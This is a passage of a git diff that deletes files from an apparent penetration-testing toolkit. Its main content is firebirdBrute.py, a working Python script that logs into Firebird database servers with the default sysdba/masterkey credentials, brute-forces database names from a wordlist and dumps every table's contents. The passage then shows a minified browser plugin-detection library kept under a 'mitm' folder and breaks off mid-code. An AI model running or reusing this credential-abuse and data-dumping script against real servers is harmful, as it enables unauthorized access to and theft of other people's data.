len(elements)==0: - sys.exit() - count+=30 diff --git a/firebird/firebirdBrute.py b/firebird/firebirdBrute.py deleted file mode 100755 index 4efee0c..0000000 --- a/firebird/firebirdBrute.py +++ /dev/null @@ -1,76 +0,0 @@ -try: - import firebirdsql,sys -except: - print "Download pyfirebirdsql from https://github.com/nakagami/pyfirebirdsql.git" -import argparse -import sys - -def extractDB(database,ipAddr): - con = firebirdsql.connect( - host=ipAddr, database=database, - user='sysdba', password='masterkey' - ) - cur = con.cursor() - cur.execute("select rdb$relation_name from rdb$relations where rdb$view_blr is null and (rdb$system_flag is null or rdb$system_flag = 0);") - results = cur.fetchall() - print "\n- Found the below tables" - for x in results: - print x[0] - - for x in results: - print "\n- Extracing the contents from the table: "+x[0] - cur.execute("select * from "+x[0]+";") - results = cur.fetchall() - print results - -def connectFirebird(ipAddr,wordList): - defaultDB="C:\\PROGRAM FILES\\FIREBIRD\\FIREBIRD_2_5\\EXAMPLES\\EMPBUILD\\EMPLOYEE.FDB" - - #Try getting list of connected databases without attempting any database name guess. - con = firebirdsql.services.connect(host=ipAddr, user='sysdba', password='masterkey') - results = con.getAttachedDatabaseNames() - dbList=[] - if len(results)>0: - for x in results: - if x!=defaultDB: - #Remove the default database - dbList.append(x) - print "\n- Found the below connected databases" - for x in dbList: - print x - for x in dbList: - print "\n- Extracting contents from Firebird database: "+x - extractDB(x,ipAddr) - else: - #Brutefoorce firebird databasess - print "\n- Bruteforcing Firebird database names" - dictList=[] - with open(wordList) as f: - dictList = f.read().splitlines() - currentWord="" - for word in dictList: - currentWord=word - try: - con = firebirdsql.connect( - host=ipAddr, database=word, - user='sysdba', password='masterkey' - ) - print "Correct database name: "+word - break - except firebirdsql.OperationalError: - print "Incorrect database name: "+word - continue - extractDB(currentWord,ipAddr) - -if __name__ == '__main__': - print "This tool attempts to brute force the database names on the Firebird database server using the default credentials (sysdba|masterkey)" - parser = argparse.ArgumentParser() - parser.add_argument('-host', dest='ipAddr', action='store', help='[IP address of Firebird database server]') - parser.add_argument('-wordlist', dest='wordList', action='store', help='[File containing list of database names to brute force]') - - if len(sys.argv)==1: - parser.print_help() - sys.exit(1) - options = parser.parse_args() - if options.ipAddr: - connectFirebird(options.ipAddr,options.wordList) diff --git a/mitm/PluginDetect_All.js b/mitm/PluginDetect_All.js deleted file mode 100755 index 5cb4a99..0000000 --- a/mitm/PluginDetect_All.js +++ /dev/null @@ -1,7 +0,0 @@ -/* -PluginDetect v0.8.3 -www.pinlady.net/PluginDetect/license/ -[ getVersion isMinVersion hasMimeType onDetectionDone getInfo ] -[ QuickTime Java DevalVR Flash Shockwave WMP Silverlight VLC AdobeReader PDFReader RealPlayer IEcomponent ActiveX PDF.js ] -*/ -var PluginDetect={version:"0.8.3",name:"PluginDetect",openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,\-]*/,splitNumRegx:/[\.\_,\-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;ag(b[a],10)){return 1}if(g(c[a],10)c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},getPROP:function(d,b,a){var c;try{if(d){a=d[b]}}catch(c){}return a},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var d=null,c,b=this;try{d=new b.AXO(a)}catch(c){};return d},INIT:function(){this.init.library(this)},init:{$:1,hasRun:0,objProperties:function(d,e,b){var a,c={};if(e&&b){if(e[b[0]]===1&&!d.isArray(e)&&!d.isFunc(e)&&!d.isString(e)&&!d.isNum(e)){for(a=0;a=0;b=b-2){if(c[b]&&new RegExp(c[b],"i").test(a)){d.OS=c[b+1];break}}}},library:function(c){var e=this,d=document,b,a;c.init.objProperties(c,c,["$",c]);for(a in c.Plugins){c.init.plugin(c.Plugins[a],a)}e.publicMethods(c.PUBLIC,c);c.win.init();c.head=d.getElementsByTagName("head")[0]||d.getElementsByTagName("body")[0]||d.body||null;e.detectPlatform();e.detectIE();e.detectNonIE();c.init.hasRun=1}},ev:{$:1,handler:function(c,b,a){return function(){c(b,a)}},fPush:function(b,a){var c=this,d=c.$;if(d.isArray(a)&&(d.isFunc(b)||(d.isArray(b)&&b.length>0&&d.isFunc(b[0])))){a.push(b)}},callArray:function(a){var b=this,d=b.$,c;if(d.isArray(a)){while(a.length){c=a[0];a.splice(0,1);b.call(c)}}},call:function(d){var b=this,c=b.$,a=c.isArray(d)?d.length:-1;if(a>0&&c.isFunc(d[0])){d[0](c,a>1?d[1]:0,a>2?d[2]:0,a>3?d[3]:0)}else{if(c.isFunc(d)){d(c)}}}},PUBLIC:{isMinVersion:function(b){var a=function(j,h,e,d){var f=b.findPlugin(j),g,c=-1;if(f.status<0){return f.status}g=f.plugin;h=b.formatNum(b.isNum(h)?h.toString():(b.isStrNum(h)?b.getNum(h):"0"));if(g.getVersionDone!=1){g.getVersion(h,e,d);if(g.getVersionDone===null){g.getVersionDone=1}}if(g.installed!==null){c=g.installed<=0.5?g.installed:(g.installed==0.7?1:(g.version===null?0:(b.compareNums(g.version,h,g)>=0?1:-0.1)))};return c};return a},getVersion:function(b){var a=function(h,e,d){var f=b.findPlugin(h),g,c;if(f.status<0){return null};g=f.plugin;if(g.getVersionDone!=1){g.getVersion(null,e,d);if(g.getVersionDone===null){g.getVersionDone=1}}c=(g.version||g.version0);c=c?c.replace(b.splitNumRegx,b.getVersionDelimiter):c;return c};return a},getInfo:function(b){var a=function(h,e,d){var c={},f=b.findPlugin(h),g;if(f.status<0){return c};g=f.plugin;if(g.getInfo){if(g.getVersionDone===null){b.getVersion?b.getVersion(h,e,d):b.isMinVersion(h,"0",e,d)}c=g.getInfo()};return c};return a},onDetectionDone:function(b){var a=function(j,h,d,c){var e=b.findPlugin(j),k,g;if(e.status==-3){return -1}g=e.plugin;if(!b.isArray(g.funcs)){g.funcs=[]};if(g.getVersionDone!=1){k=b.getVersion?b.getVersion(j,d,c):b.isMinVersion(j,"0",d,c)}if(g.installed!=-0.5&&g.installed!=0.5){b.ev.call(h);return 1}b.ev.fPush(h,g.funcs);return 0};return a},hasMimeType:function(b){var a=function(d){if(!b.isIE&&d&&navigator&&navigator.mimeTypes){var g,f,c,e=b.isArray(d)?d:(b.isString(d)?[d]:[]);for(c=0;c=7?0:1},checkGarbage:function(d){var b=this,c=b.$,a;if(c.isIE&&d&&c.getPROP(d.firstChild,"object")){a=c.getPROP(d.firstChild,"readyState");if(c.isNum(a)&&a!=4){b.garbage=1;return 1}}return 0},emptyGarbage:function(){var a=this,b=a.$,c;if(b.isIE&&a.garbage){try{window.CollectGarbage()}catch(c){}a.garbage=0}},init:function(e){if(!e.init){var c=this,d=c.$,a,b;e.init=1;e.min=0;e.max=0;e.hasRun=0;e.version=null;e.L=0;e.altHTML="";e.span=document.createElement("span");e.tagA=''+e.altHTML+d.openTag+"/object>";for(a=0;a=0){return 0}c.innerHTML=i.tagA+b+i.tagB;if(g.getPROP(c.firstChild,"object")){a=1};f.checkGarbage(c);c.innerHTML="";if(a){i.min=b}else{i.max=b}return a},convert_:function(f,a,b,e){var d=f.convert[a],c=f.$;return d?(c.isFunc(d)?c.formatNum(d(b.split(c.splitNumRegx),e).join(",")):b):d},convert:function(h,c,g){var e=this,f=h.$,b,a,d;c=f.formatNum(c);a={v:c,x:-1};if(c){for(b=0;b=0&&(!b||f.compareNums(c,g?e.convert_(h,b,h.Upper[b]):h.Upper[b])<0)){a.v=e.convert_(h,b,c,g);a.x=b;break}}}return a},isMin:function(g,f){var d=this,e=g.$,c,b,a=0;d.init(g);if(!e.isStrNum(f)||d.isDisabled()){return a};if(!g.L){g.L={};for(c=0;c=0){a=(g.L.x==b.x?d.isActiveXObject(g,b.v):e.compareNums(f,g.L.v)<=0)?1:-1}};return a},search:function(g){var k=this,h=k.$,i=g.$$,b=0,c;k.init(g);c=(g.hasRun||k.isDisabled())?1:0;g.hasRun=1;if(c){return g.version};var o,n,m,j=function(q,t){var r=[].concat(f),s;r[q]=t;s=k.isActiveXObject(g,r.join(","));if(s){b=1;f[q]=t}else{p[q]=t}return s},d=g.DIGITMAX,e,a,l=99999999,f=[0,0,0,0],p=[0,0,0,0];for(o=0;op[o]&&h.compareNums(a,g.Lower[m])>=0&&h.compareNums(e,g.Upper[m])<0){p[o]=Math.floor(d[m][o])}}}for(n=0;n<30;n++){if(p[o]-f[o]<=16){for(m=p[o];m>=f[o]+(o?1:0);m--){if(j(o,m)){break}}break}j(o,Math.round((p[o]+f[o])/2))}if(!b){break}p[o]=f[o]}if(b){g.version=k.convert(g,f.join(",")).v};return g.version}},win:{$:1,loaded:false,hasRun:0,init:function(){var b=this,a=b.$;if(!b.hasRun){b.hasRun=1;b.addEvent("load",a.ev.handler(b.runFuncs,a));b.addEvent("unload",a.ev.handler(b.cleanup,a))}},addEvent:function(c,b){var e=this,d=e.$,a=window;if(d.isFunc(b)){if(a.addEventListener){a.addEventListener(c,b,false)}else{if(a.attachEvent){a.attachEvent("on"+c,b)}else{a["on"+c]=e.concatFn(b,a["on"+c])}}}},concatFn:function(d,c){return function(){d();if(typeof c=="function"){c()}}},funcs0:[],funcs:[],cleanup:function(b){if(b){for(var a in b){b[a]=0}b=0}},runFuncs:function(a){if(a&&!a.win.loaded){a.win.loaded=true;a.ev.callArray(a.win.funcs0);a.ev.callArray(a.win.funcs);if(a.DOM){a.DOM.onDoneEmptyDiv()}}},z:0},DOM:{$:1,isEnabled:{$:1,objectTag:function(){var a=this.$;return a.isIE?a.ActiveXEnabled:1},objectProperty:function(){var a=this.$;return a.isIE&&a.verIE>=7?1:0}},div:null,divID:"plugindetect",divClass:"doNotRemove",divWidth:50,getDiv:function(){var a=this;return a.div||document.getElementById(a.divID)||null},isDivPermanent:function(){var b=this,c=b.$,a=b.getDiv();return a&&c.isString(a.className)&&a.className.toLowerCase().indexOf(b.divClass.toLowerCase())>-1?1:0},initDiv:function(b){var c=this,d=c.$,a;if(!c.div){a=c.getDiv();if(a){c.div=a}else{if(b){c.div=document.createElement("div");c.div.id=c.divID}}if(c.div){c.setStyle(c.div,c.defaultStyle.concat(["display","block","width",c.divWidth+"px","height",(c.pluginSize+3)+"px","fontSize",(c.pluginSize+3)+"px","lineHeight",(c.pluginSize+3)+"px"]));if(!a){c.setStyle(c.div,["position","absolute","right","0px","top","0px"]);c.insertDivInBody(c.div)}}}},pluginSize:1,altHTML:"     ",emptyNode:function(c){var b=this,d=b.$,a,f;if(c&&c.childNodes){for(a=c.childNodes.length-1;a>=0;a--){if(d.isIE){b.setStyle(c.childNodes[a],["display","none"])}c.removeChild(c.childNodes[a])}}},LASTfuncs:[],onDoneEmptyDiv:function(){var f=this,g=f.$,b,d,c,a,h;f.initDiv();if(!g.win.loaded||g.win.funcs0.length||g.win.funcs.length){return}for(b in g.Plugins){d=g.Plugins[b];if(d){if(d.OTF==3||(d.funcs&&d.funcs.length)){return}}}g.ev.callArray(f.LASTfuncs);a=f.getDiv();if(a){if(f.isDivPermanent()){}else{if(a.childNodes){for(b=a.childNodes.length-1;b>=0;b--){c=a.childNodes[b];f.emptyNode(c)}try{a.innerHTML=""}catch(h){}}if(a.parentNode){try{a.parentNode.removeChild(a)}catch(h){}a=null;f.div=null}}}},width:function(){var g=this,e=g.DOM,f=e.$,d=g.span,b,c,a=-1;b=d&&f.isNum(d.scrollWidth)?d.scrollWidth:a;c=d&&f.isNum(d.offsetWidth)?d.offsetWidth:a;return c>0?c:(b>0?b:Math.max(c,b))},obj:function(b){var d=this,c=d.span,a=c&&c.firstChild?c.firstChild:null;return a},readyState:function(){var b=this,a=b.DOM.$;return a.isIE?a.getPROP(b.obj(),"readyState"):b.undefined},objectProperty:function(){var d=this,b=d.DOM,c=b.$,a;if(b.isEnabled.objectProperty()){a=c.getPROP(d.obj(),"object")}return a},getTagStatus:function(b,m,r,p,f,h){var s=this,d=s.$,q;if(!b||!b.span){return -2}var k=b.width(),c=b.readyState(),a=b.objectProperty();if(a){return 1.5}var g=/clsid\s*\:/i,o=r&&g.test(r.outerHTML||"")?r:(p&&g.test(p.outerHTML||"")?p:0),i=r&&!g.test(r.outerHTML||"")?r:(p&&!g.test(p.outerHTML||"")?p:0),l=b&&g.test(b.outerHTML||"")?o:i;if(!m||!m.span||!l||!l.span){return 0}var j=l.width(),n=m.width(),t=l.readyState();if(k<0||j<0||n<=s.pluginSize){return 0}if(h&&!b.pi&&d.isDefined(a)&&d.isIE&&b.tagName==l.tagName&&b.time<=l.time&&k===j&&c===0&&t!==0){b.pi=1}if(j=n){if(!b.winLoaded&&d.win.loaded){return b.pi?-0.5:-1}if(d.isNum(f)){if(!d.isNum(b.count2)){b.count2=f}if(f-b.count2>0){return b.pi?-0.5:-1}}}try{if(k==s.pluginSize&&(!d.isIE||c===4)){if(!b.winLoaded&&d.win.loaded){return 1}if(b.winLoaded&&d.isNum(f)){if(!d.isNum(b.count)){b.count=f}if(f-b.count>=5){return 1}}}}catch(q){}return b.pi?-0.1:0},setStyle:function(b,h){var c=this,d=c.$,g=b.style,a,f;if(g&&h){for(a=0;a.'+d.openTag+"/div>");c=i.getElementById(b)}catch(g){}}f=i.getElementsByTagName("body")[0]||i.body;if(f){f.insertBefore(a,f.firstChild);if(c){f.removeChild(c)}}},defaultStyle:["verticalAlign","baseline","outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"],insert:function(b,i,g,h,c,q,o){var s=this,f=s.$,r,t=document,v,m,p=t.createElement("span"),k,a,l="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:"+(q?"hidden;":"visible;")+"display:inline;";if(!f.isDefined(h)){h=""}if(f.isString(b)&&(/[^\s]/).test(b)){b=b.toLowerCase().replace(/\s/g,"");v=f.openTag+b+" ";v+='style="'+l+'" ';var j=1,u=1;for(k=0;k'}}v+=h+f.openTag+"/"+b+">"}else{b="";v=h}if(!o){s.initDiv(1)}var n=o||s.getDiv();m={span:null,winLoaded:f.win.loaded,tagName:b,outerHTML:v,DOM:s,time:new Date().getTime(),width:s.width,obj:s.obj,readyState:s.readyState,objectProperty:s.objectProperty};if(n&&n.parentNode){s.setStyle(p,s.defaultStyle.concat(["display","inline"]).concat(o?[]:["fontSize",(s.pluginSize+3)+"px","lineHeight",(s.pluginSize+3)+"px"]));n.appendChild(p);try{p.innerHTML=v}catch(r){};m.span=p;m.winLoaded=f.win.loaded}return m}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\\."):"";d=new RegExp("^(.*[^\\/])("+g+"\\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{quicktime:{$:1,mimeType:["video/quicktime","application/x-quicktimeplayer","image/x-macpaint","image/x-quicktime"],progID:"QuickTimeCheckObject.QuickTimeCheck.1",progID0:"QuickTime.QuickTime",classID:"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B",codebase:{$:1,isMin:function(a){return this.$.codebase.isMin(this,a)},search:function(){return this.$.codebase.search(this)},ParamTags:'',DIGITMAX:[[12,11,11],[7,60],[7,11,11],0,[7,11,11]],DIGITMIN:[5,0,0,0],Upper:["999","7,60","7,50","7,6","7,5"],Lower:["7,60","7,50","7,6","7,5","0"],convert:[1,function(b,a){return a?[b[0],b[1]+b[2],b[3],"0"]:[b[0],b[1].charAt(0),b[1].charAt(1),b[2]]},1,0,1]},setPluginStatus:function(d,a,f){var e=this,c=e.$,b=e.installed;e.installed=a?1:(f?(f>0?0.7:-0.1):(d?0:-1));if(a){e.version=c.formatNum(a,3)}e.getVersionDone=e.installed==0.7||e.installed==-0.1?0:1;c.codebase.emptyGarbage()},getVersion:function(c){var h=this,d=h.$,a=null,g=null,b,f;if(!d.isIE){if(d.hasMimeType(h.mimeType)){g=d.OS!=3?d.findNavPlugin("QuickTime.*Plug-?in",0):null;if(g&&g.name){a=d.getNum(g.name)}}}else{if(d.isStrNum(c)){b=c.split(d.splitNumRegx);if(b.length>3&&parseInt(b[3],10)>0){b[3]="9999"}c=b.join(",")}b=h.codebase.isMin(c);if(b){h.setPluginStatus(0,0,b);return}if(!a||d.dbug){a=h.codebase.search()}if(!a||d.dbug){g=d.getAXO(h.progID);b=d.getPROP(g,"QuickTimeVersion");if(b&&b.toString){a=b.toString(16);a=parseInt(a.charAt(0)||"0",16)+"."+parseInt(a.charAt(1)||"0",16)+"."+parseInt(a.charAt(2)||"0",16)}}}h.setPluginStatus(g,a)}},java:{$:1,mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeType_dummy:"application/dummymimejavaapplet",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",classID_dummy:"clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",navigator:{$:1,a:(function(){var b,a=!0;try{a=window.navigator.javaEnabled()}catch(b){}return a})(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,info:{$:1,Plugin2Status:0,setPlugin2Status:function(a){if(this.$.isNum(a)){this.Plugin2Status=a}},getPlugin2Status:function(){var c=this,d=c.$,b=c.$$,i=b.navigator,f,g,k,h,j,a;if(c.Plugin2Status===0){if(d.isIE&&d.OS==1&&(/Sun|Oracle/i).test(c.getVendor())){f=c.isMinJre4Plugin2();if(f>0){c.setPlugin2Status(1)}else{if(f<0){c.setPlugin2Status(-1)}}}else{if(!d.isIE&&i.pluginObj){k=/Next.*Generation.*Java.*Plug-?in|Java.*Plug-?in\s*2\s/i;h=/Classic.*Java.*Plug-in/i;j=i.pluginObj.description||"";a=i.pluginObj.name||"";if(k.test(j)||k.test(a)){c.setPlugin2Status(1)}else{if(h.test(j)||h.test(a)){c.setPlugin2Status(-1)}}}}}return c.Plugin2Status},isMinJre4Plugin2:function(a){var f=this,e=f.$,c=f.$$,d="",g=c.applet.codebase,b=c.applet.getResult()[0];if(e.OS==1){d="1,6,0,10"}else{if(e.OS==2){d="1,6,0,12"}else{if(e.OS==3){d="1,6,0,10"}else{d="1,6,0,10"}}}if(!a){a=(b&&!c.applet.isRange(b)?b:0)||c.version||(g.min&&d?(g.isMin(d)>0?d:"0,0,0,0"):0)}a=e.formatNum(e.getNum(a));return a?(e.compareNums(a,d)>=0?1:-1):0},BrowserForbidsPlugin2:function(){var a=this.$;if(a.OS>=20){return 0}if((a.isIE&&a.verIE<6)||(a.isGecko&&a.compareNums(a.verGecko,"1,9,0,0")<0)||(a.isOpera&&a.verOpera&&a.verOpera<10.5)){return 1}return 0},BrowserRequiresPlugin2:function(){var a=this.$;if(a.OS>=20){return 0}if((a.isGecko&&a.compareNums(a.verGecko,"1,9,2,0")>=0)||a.isChrome||(a.OS==1&&a.verOpera&&a.verOpera>=10.6)){return 1}return 0},VENDORS:["Sun Microsystems Inc.","Apple Computer, Inc.","Oracle Corporation"],OracleMin:"1,7,0,0",OracleOrSun:function(a){var c=this,b=c.$;return c.VENDORS[b.compareNums(b.formatNum(a),c.OracleMin)<0?0:2]},OracleOrApple:function(a){var c=this,b=c.$;return c.VENDORS[b.compareNums(b.formatNum(a),c.OracleMin)<0?1:2]},getVendor:function(){var d=this,c=d.$,b=d.$$,f=b.vendor||b.applet.getResult()[1]||"",e=b.applet.codebase,a;if(!f){a=b.DTK.version||e.version||(e.min?(e.isMin(d.OracleMin)>0?d.OracleMin:"0,0,0,0"):0);if(a){f=d.OracleOrSun(a)}else{if(b.version){if(c.OS==2){f=d.OracleOrApple(b.version)}else{if((!c.isIE&&c.OS==1)||c.OS==3){f=d.OracleOrSun(b.version)}}}}}return f},isPlugin2InstalledEnabled:function(){var b=this,d=b.$,a=b.$$,i=-1,f=a.installed,g=b.getPlugin2Status(),h=b.BrowserRequiresPlugin2(),e=b.BrowserForbidsPlugin2(),c=b.isMinJre4Plugin2();if(f!==null&&f>=-0.1){if(g>=3){i=1}else{if(g<=-3){}else{if(g==2){i=1}else{if(g==-2){}else{if(h&&g>=0&&c>0){i=1}else{if(e&&g<=0&&c<0){}else{if(h){i=1}else{if(e){}else{if(g>0){i=1}else{if(g<0){}else{if(c<0){}else{i=0}}}}}}}}}}}}return i},result:{$:1,getDeploymentToolkitObj:function(){var a=this,d=a.$,b=a.$$,e=b.info,c=b.DTK;c.query(1);e.updateResult();return c.status&&c.HTML?c.HTML.obj():c.status}},updateResult:function(){var c=this,e=c.$,b=c.$$,a=b.applet,i,k=b.installed,h=b.DTK,g=a.results,l=c.result;l.DeployTK_versions=[].concat(e.isArray(h.VERSIONS)?h.VERSIONS:[]);l.vendor=c.getVendor();l.isPlugin2=c.isPlugin2InstalledEnabled();l.OTF=b.OTF<3?0:(b.OTF==3?1:2);l.JavaAppletObj=null;for(i=0;i0){f[i]=0}else{if(a.allowed[i]>=1&&b.OTF!=3&&(a.isDisabled.single(i)||k==-0.2||k==-1||a.active[i]<0||(i==3&&(!e.isIE||(/Microsoft/i).test(l.vendor))))){f[i]=-1}}}else{if(i==3&&g[0][0]){f[i]=0}else{if(a.isDisabled.single(i)){f[i]=-1}}}}}l.objectTag=f[1];l.appletTag=f[2];l.objectTagActiveX=f[3];l.name="";l.description="";var j=0;if(!e.isIE){if(b.navMime.query().pluginObj){j=b.navMime.pluginObj}else{if(b.navigator.pluginObj){j=b.navigator.pluginObj}}if(j){l.name=j.name||"";l.description=j.description||""}}l.All_versions=[].concat((l.DeployTK_versions.length?l.DeployTK_versions:(e.isString(b.version)?[b.version]:[])));var d=l.All_versions;for(i=0;i=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,i,g,h){var b=this,e=b.$,f,c=0,a=b.applet;g=g||b.version0;f=a.isRange(d);if(f){if(a.setRange(f,h)==d){c=f}d=0}if(b.OTF<3){b.installed=c?(c>0?0.7:-0.1):(d?1:(g?-0.2:-1))}if(b.OTF==2&&b.NOTF&&!b.applet.getResult()[0]){b.installed=g?-0.2:-1}if(b.OTF==3&&b.installed!=-0.5&&b.installed!=0.5){b.installed=(b.NOTF.isJavaActive(1)==1?0.5:-0.5)}if(b.OTF==4&&(b.installed==-0.5||b.installed==0.5)){if(d){b.installed=1}else{if(c){b.installed=c>0?0.7:-0.1}else{if(b.NOTF.isJavaActive(1)==1){if(g){b.installed=1;d=g}else{b.installed=0}}else{if(g){b.installed=-0.2}else{b.installed=-1}}}}}if(g){b.version0=e.formatNum(e.getNum(g))}if(d&&!c){b.version=e.formatNum(e.getNum(d))}if(i&&e.isString(i)){b.vendor=i}if(!b.vendor){b.vendor=""}if(b.verify&&b.verify.isEnabled()){b.getVersionDone=0}else{if(b.getVersionDone!=1){if(b.OTF<2){b.getVersionDone=0}else{b.getVersionDone=b.applet.can_Insert_Query_Any()?0:1}}};e.codebase.emptyGarbage()},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(a){var b=this,c=b.$;if(!a&&(!c.DOM.isEnabled.objectTag()||(c.isIE&&c.verIE<6)||(c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome)){return 1}return 0},query:function(n){var l=this,h=l.$,f=l.$$,k,m,i,a=h.DOM.altHTML,g={},b,d=null,j=null,c=(l.hasRun||l.isDisabled(n));l.hasRun=1;if(c){return l}l.status=0;if(h.isIE){for(m=0;m0?1:-1;for(m=0;m0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",isDisabled:function(){var d=this,c=d.$,b=d.$$,a=b.navigator;if(c.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.isDisabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";if(!f||e.dbug){g=/Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;if((g.test(a)||g.test(i))&&parseInt(RegExp.$1,10)>=5){f="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0")}}if(!f||e.dbug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.formatNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},applet:{$:1,codebase:{$:1,isMin:function(a){return this.$.codebase.isMin(this,a)},search:function(){return this.$.codebase.search(this)},ParamTags:'',DIGITMAX:[[16,64],[6,0,512],0,[1,5,2,256],0,[1,4,1,1],[1,4,0,64],[1,3,2,32]],DIGITMIN:[1,0,0,0],Upper:["999","10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4"],Lower:["10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4","0"],convert:[function(b,a){return a?[parseInt(b[0],10)>1?"99":parseInt(b[1],10)+3+"",b[3],"0","0"]:["1",parseInt(b[0],10)-3+"","0",b[1]]},function(b,a){return a?[b[1],b[2],b[3]+"0","0"]:["1",b[0],b[1],b[2].substring(0,b[2].length-1||1)]},0,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},0,1,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},1]},results:[[null,null],[null,null],[null,null],[null,null]],getResult:function(){var b=this,d=b.results,a,c=[];for(a=d.length-1;a>=0;a--){c=d[a];if(c[0]){break}}c=[].concat(c);return c},DummySpanTagHTML:0,HTML:[0,0,0,0],active:[0,0,0,0],DummyObjTagHTML:0,DummyObjTagHTML2:0,allowed:[1,1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;ba-1&&d.isNum(c[a-1])){if(c[a-1]<0){c[a-1]=0}if(c[a-1]>3){c[a-1]=3}b.allowed[a]=c[a-1]}}b.allowed[0]=b.allowed[3]}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(c.dbug){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},isDisabled:{$:1,single:function(d){var a=this,c=a.$,b=a.$$;if(d==0){return c.codebase.isDisabled()}if((d==3&&!c.isIE)||a.all()){return 1}if(d==1||d==3){return !c.DOM.isEnabled.objectTag()}if(d==2){return a.AppletTag()}},aA_:null,all:function(){var c=this,e=c.$,d=c.$$,b=d.navigator,a=0;if(c.aA_===null){if(e.OS>=20){a=0}else{if(e.verOpera&&e.verOpera<11&&!b.javaEnabled()){a=1}else{if((e.verGecko&&e.compareNums(e.verGecko,e.formatNum("2"))<0)&&!b.mimeObj){a=1}else{if(c.AppletTag()&&!e.DOM.isEnabled.objectTag()){a=1}}}};c.aA_=a}return c.aA_},AppletTag:function(){var 